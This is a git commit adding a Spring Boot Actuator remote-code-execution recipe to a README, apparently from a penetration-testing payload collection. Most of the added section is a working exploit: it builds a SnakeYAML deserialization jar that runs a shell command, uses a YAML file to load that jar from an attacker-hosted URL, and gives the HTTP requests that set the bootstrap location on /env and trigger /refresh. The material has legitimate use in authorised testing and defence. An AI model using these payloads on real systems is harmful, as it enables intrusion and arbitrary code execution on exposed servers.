Add Springboot Actuator RCE

2024-04-24 09:15:05 +02:00 · 2020-10-28 12:05:12 -04:00 · 2020-10-28 12:05:12 -04:00 · 1535077d9d
parent ae3a4d4336
commit 1535077d9d
1 changed files with 80 additions and 5 deletions
--- a/Interface/README.md
+++ b/Interface/README.md
@ -4,16 +4,91 @@

 Actuator endpoints let you monitor and interact with your application. 
 Spring Boot includes a number of built-in endpoints and lets you add your own. 
-For example, the health endpoint provides basic application health information. 
+For example, the `/health` endpoint provides basic application health information. 
+
 Some of them contains sensitive info such as :

- `/trace` (by default the last 100 HTTP requests with headers)
- `/env` (the current environment properties)
- `/heapdump` (builds and returns a heap dump from the JVM used by our application). 
+- `/trace` - Displays trace information (by default the last 100 HTTP requests with headers).
+- `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment).
+- `/heapdump` - Builds and returns a heap dump from the JVM used by our application.
+- `/dump` - Displays a dump of threads (including a stack trace).
+- `/logfile` - Outputs the contents of the log file.
+- `/mappings` - Shows all of the MVC controller mappings.

-These endpoints are enabled by default in Springboot 1.X. Since Springboot 2.x only `/health` and `/info` are enabled by default.
+These endpoints are enabled by default in Springboot 1.X.
+Note: Sensitive endpoints will require a username/password when they are accessed over HTTP.

+Since Springboot 2.X only `/health` and `/info` are enabled by default.
+
+### Remote Code Execution via `/env`
+
+Spring is able to load external configurations in the YAML format.
+The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
+In other words, an attacker can gain remote code execution by loading a malicious config file.
+
+#### Steps
+
+1. Generate a payload of SnakeYAML deserialization gadget.
+
+- Build malicious jar
+```bash
+git clone https://github.com/artsploit/yaml-payload.git
+cd yaml-payload
+# Edit the payload before executing the last commands (see below)
+javac src/artsploit/AwesomeScriptEngineFactory.java
+jar -cvf yaml-payload.jar -C src/ .
+```
+
+- Edit src/artsploit/AwesomeScriptEngineFactory.java
+
+```java
+public AwesomeScriptEngineFactory() {
+    try {
+        Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE
+    } catch (IOException e) {
+        e.printStackTrace();
+    }
+}
+```
+
+- Create a malicious yaml config (yaml-payload.yml)
+
+```yaml
+!!javax.script.ScriptEngineManager [
+  !!java.net.URLClassLoader [[
+    !!java.net.URL ["http://attacker.example/yaml-payload.jar"]
+  ]]
+]
+```
+
+
+2. Host the malicious files on your server.
+
+- yaml-payload.jar
+- yaml-payload.yml
+
+
+3. Change `spring.cloud.bootstrap.location` to your server.
+
+```
+POST /env HTTP/1.1
+Host: victim.example:8090
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 59
+ 
+spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml
+```
+
+4. Reload the configuration.
+
+```
+POST /refresh HTTP/1.1
+Host: victim.example:8090
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```

 ## References

 * [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
+* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators)